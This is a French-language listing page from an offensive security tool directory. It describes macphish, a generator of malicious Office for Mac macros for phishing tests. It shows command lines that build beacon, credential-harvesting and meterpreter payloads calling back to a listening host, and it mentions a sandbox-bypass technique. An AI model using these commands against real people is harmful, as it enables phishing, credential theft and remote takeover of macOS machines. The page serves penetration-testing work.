Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
macphish — Génère des macros Office pour Mac malveillantes avec des charges utiles de balise, de récolte d'identifiants et de meterpreter pour les tests de phishing et d'exploitation sur macOS. | Kitploit
Outils/GitHubGitHub/cldrn/macphish
Génération de PayloadsExploitationHameçonnage
GitHubcldrn/macphish

macphish

Génère des macros Office pour Mac malveillantes avec des charges utiles de balise, de récolte d'identifiants et de meterpreter pour les tests de phishing et d'exploitation sur macOS.

Voir le dépôt
2455049il y a 11 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

macphish

Générateur de charges utiles de macros pour Office Mac macphish

Vecteurs d'attaque

Il y a 4 vecteurs d'attaque disponibles :

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

Pour la méthode 'creds', macphish peut générer le script Applescript directement, au cas où vous auriez besoin de l'exécuter depuis un shell.

beacon

Lors de l'exécution, cette charge utile signalera notre hôte d'écoute et fournira des informations système de base sur la victime. La façon la plus simple de générer une charge utile beacon est :

root@kitploit:~
$./macphish.py -lh <listening host> 

Par défaut, il utilise curl mais d'autres utilitaires (wget, nslookup) peuvent être utilisés en modifiant le modèle de commande.

creds

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

La façon la plus simple de générer une charge utile meterpreter est :

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

Pour générer une charge utile meterpreter qui appelle d'abord GrantAccessToMultipleFiles() :

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

Pour les attaques meterpreter, seules les charges utiles Python sont prises en charge pour le moment.

Utilisation

Voir https://github.com/cldrn/macphish/wiki/Usage

PoCs

  • Contournement du bac à sable en utilisant GrantAccessToMultipleFiles dans Word pour Mac
  • Preuve de concept des permissions globales et récursives - Macros malveillantes pour Word sous MacOS
  • Exécution de Meterpreter dans Office pour Mac avec des macros
  • Récupération d'identifiants (hameçonnage) avec des macros Word sous macOS
Télécharger l’outil